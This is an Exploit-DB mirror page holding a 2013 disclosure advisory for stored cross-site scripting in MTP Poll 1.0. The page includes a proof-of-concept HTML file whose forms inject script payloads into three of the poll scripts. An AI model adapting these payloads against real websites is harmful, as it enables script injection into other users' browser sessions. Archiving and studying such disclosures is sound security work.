bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/24546.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

66 lines
No EOL
2.3 KiB
Text
Raw Blame History

<!--
MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities
Vendor: MTP Scripts
Product web page: http://www.morephp.net
Affected version: 1.0
Summary: More than poll is a polling system with a powerful
administration tool. It features: multiple pools, templates,
unlimited options, IP Logging, cookie support, and more.
Desc: MTP Poll script suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via several
parameters to several scripts is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.
Tested on: Linux, Apache2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5132
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5132.php
17.02.2013
-->
<html>
<head>
<title>MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities</title>
</head>
<body><center>
<form method="POST" action="http://localhost/poll_script/poll_add.php">
<input type="hidden" name="question" value='"><script>alert(1);</script>' />
<input type="hidden" name="color[]" value="#8bc6e1" />
<input type="hidden" name="answer[]" value='"><script>alert(2);</script>' />
<input type="hidden" name="img[]" value="" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="cat" value="0" />
<input type="hidden" name="action" value="add" />
<input type="submit" value="XSS #1" />
</form>
<br /><br />
<form method="POST" action="http://localhost/poll_script/insert_user.php">
<input type="hidden" name="ins_city" value='"><script>alert(3);</script>' />
<input type="hidden" name="ins_country" value="MK" />
<input type="hidden" name="ins_email" value="lab@zeroscience.mk" />
<input type="hidden" name="ins_fname" value='"><script>alert(4);</script>' />
<input type="hidden" name="ins_pass" value="thricerpass" />
<input type="hidden" name="ins_username" value="thricer" />
<input type="submit" value="XSS #2" />
</form>
<br /><br />
<form method="POST" action="http://localhost/poll_script/ajax_cat_ins.php">
<input type="hidden" name="name" value='"><script>alert(5);</script>' />
<input type="submit" value="XSS #3" />
</form>
</center></body>
</html>
Reference in a new issue View git blame Copy permalink